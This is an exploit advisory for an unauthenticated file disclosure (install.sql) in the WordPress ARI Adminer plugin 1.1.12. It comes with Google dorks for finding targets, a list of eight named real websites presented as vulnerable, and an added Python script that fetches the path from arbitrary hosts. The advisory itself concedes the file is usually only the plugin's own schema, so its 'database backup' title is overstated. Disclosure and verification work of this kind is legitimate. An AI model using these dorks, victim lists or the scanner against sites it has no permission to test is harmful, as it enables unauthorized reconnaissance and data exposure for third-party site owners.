#################################################################################################
# Exploit Title : WordPress Ari Adminer Plugin 1.1.12 Database Backup Disclosure
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 06/12/2018
# Vendor Homepage : ari-soft.com ~ wordpress.org/plugins/ari-adminer/
# Software Download Link : downloads.wordpress.org/plugin/ari-adminer.zip
#   + github.com/andrewcy86/ari-adminer/archive/master.zip
#   + ari-soft.com/Latest/wordpress-db-manager.html?_2018120603
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 1.1.12
# Exploit Risk : Medium
# Google Dorks :
#   inurl:''/wp-content/plugins/ari-adminer/''
#   intext:''MAY=leeksperten ITAS - presisjon for perfeksjon'' site:no
#   intext:''© 2018 M. Bradbury Photography''
# Vulnerability Type :
#   CWE-264 - [ Permissions, Privileges, and Access Controls ]
#   CWE-200 - [ Information Exposure ]
#   CWE-530 - [ Exposure of Backup File to an Unauthorized Control Sphere ]
#   (No path traversal is involved: the file sits at a fixed path inside the plugin directory.)
#################################################################################################
# Admin Panel Login Path : /wp-login.php
# Exploit : /wp-content/plugins/ari-adminer/install/install.sql
# Note : The request is unauthenticated. The file is served whenever the web server hands out
#   .sql files under wp-content verbatim. When verifying a target, check that the response body
#   is actually SQL (CREATE TABLE / INSERT INTO statements): many WordPress sites answer any path
#   with a themed 404 page and HTTP 200, which is a false positive. Also confirm what the file
#   holds before rating impact; a plugin's install/install.sql is normally the plugin's own
#   table-creation script, not a dump of the site database.
# Fix : Remove the plugin's install/ directory after activation, and deny direct access to
#   *.sql files under wp-content in the web server configuration.
#################################################################################################
# Example Vulnerable Sites =>
[+] mbradburyphotography.com/wp-content/plugins/ari-adminer/install/install.sql
[+] clubjimmy.com/WordPress3/wp-content/plugins/ari-adminer/install/install.sql
[+] designbuildideas.eu/wp-content/plugins/ari-adminer/install/install.sql
[+] mygrapefruit.com/wp-content/plugins/ari-adminer/install/install.sql
[+] voleibol.pe/wp-content/plugins/ari-adminer/install/install.sql
[+] it-as.no/wp-content/plugins/ari-adminer/install/install.sql
[+] sapeople.com/wp-content/plugins/ari-adminer/install/install.sql
[+] waupacanow.com/wp-content/plugins/ari-adminer/install/install.sql
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################
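The check described in the advisory, as an added example that is not part of the original advisory or of the ARI Adminer plugin: it requests the fixed install.sql path on each host given on the command line and classifies the answer, treating a 200 that carries an HTML body (a themed WordPress 404 page, a WAF block page) as a soft 404 rather than a hit, and listing the CREATE TABLE names so the reader can see whether the file is the plugin's own schema or something broader. The sample response bodies embedded at the bottom are constructed for the offline demonstration; the User-Agent string and the 64 KiB read limit are the example's own choices.

```python
"""Verify exposure of /wp-content/plugins/ari-adminer/install/install.sql.

Added example for the advisory above; not the plugin's or the author's code.
"""
import re
import sys
import urllib.error
import urllib.request

# Fixed path from the advisory. No traversal is needed; it is a plain GET.
EXPOSED_PATH = "/wp-content/plugins/ari-adminer/install/install.sql"

# A real SQL install script starts statements like these at the beginning of a line.
SQL_MARKERS = re.compile(
    r"^\s*(CREATE\s+TABLE|INSERT\s+INTO|DROP\s+TABLE|ALTER\s+TABLE)", re.I | re.M
)
# An HTML document served with status 200 is a soft 404 or a block page, not the file.
HTML_MARKERS = re.compile(r"<(!doctype|html|head|body)\b", re.I)
TABLE_NAME = re.compile(
    r"CREATE\s+TABLE\s+(?:IF\s+NOT\s+EXISTS\s+)?`?([\w#]+)`?", re.I
)


def classify(status, body):
    """Return 'exposed', 'not-found', 'soft-404' or 'unknown' for one response."""
    if status in (401, 403, 404):
        return "not-found"
    if status != 200:
        return "unknown"
    if HTML_MARKERS.search(body[:4096]):
        return "soft-404"
    if SQL_MARKERS.search(body):
        return "exposed"
    return "unknown"


def table_names(body):
    """Table names created by the script, sorted, so impact can be judged by content."""
    return sorted({m.group(1) for m in TABLE_NAME.finditer(body)})


def fetch(base_url, timeout=10):
    """GET the exposed path on base_url and return (status, body_text)."""
    url = base_url.rstrip("/") + EXPOSED_PATH
    req = urllib.request.Request(url, headers={"User-Agent": "install-sql-check/1.0"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read(65536).decode("utf-8", "replace")
    except urllib.error.HTTPError as exc:
        return exc.code, ""


def check_host(base_url):
    status, body = fetch(base_url)
    verdict = classify(status, body)
    tables = table_names(body) if verdict == "exposed" else []
    return verdict, status, tables


# Constructed sample responses for running the classifier offline.
SAMPLE_SQL = (
    "-- constructed sample, not the real plugin file\n"
    "CREATE TABLE IF NOT EXISTS `wp_ari_adminer_connections` (\n"
    "  `id` int(11) NOT NULL AUTO_INCREMENT,\n"
    "  PRIMARY KEY (`id`)\n"
    ");\n"
    "INSERT INTO `wp_ari_adminer_connections` VALUES (1);\n"
)
SAMPLE_SOFT_404 = "<!DOCTYPE html><html><head><title>Page not found</title></head></html>"


if __name__ == "__main__":
    if len(sys.argv) == 1:
        # No hosts given: show the classifier on the constructed samples.
        print("sample sql   ->", classify(200, SAMPLE_SQL), table_names(SAMPLE_SQL))
        print("sample html  ->", classify(200, SAMPLE_SOFT_404))
    for host in sys.argv[1:]:
        verdict, status, tables = check_host(host)
        print(f"{host}: {verdict} (HTTP {status})" + (f" tables={tables}" if tables else ""))
```

Run it as `python3 check.py https://example.test` for each host under test; with no arguments it only exercises the constructed samples. The split between `fetch` and `classify` is deliberate: the verdict logic can be unit-tested, and the same `classify` rule can be reused on responses captured by another tool.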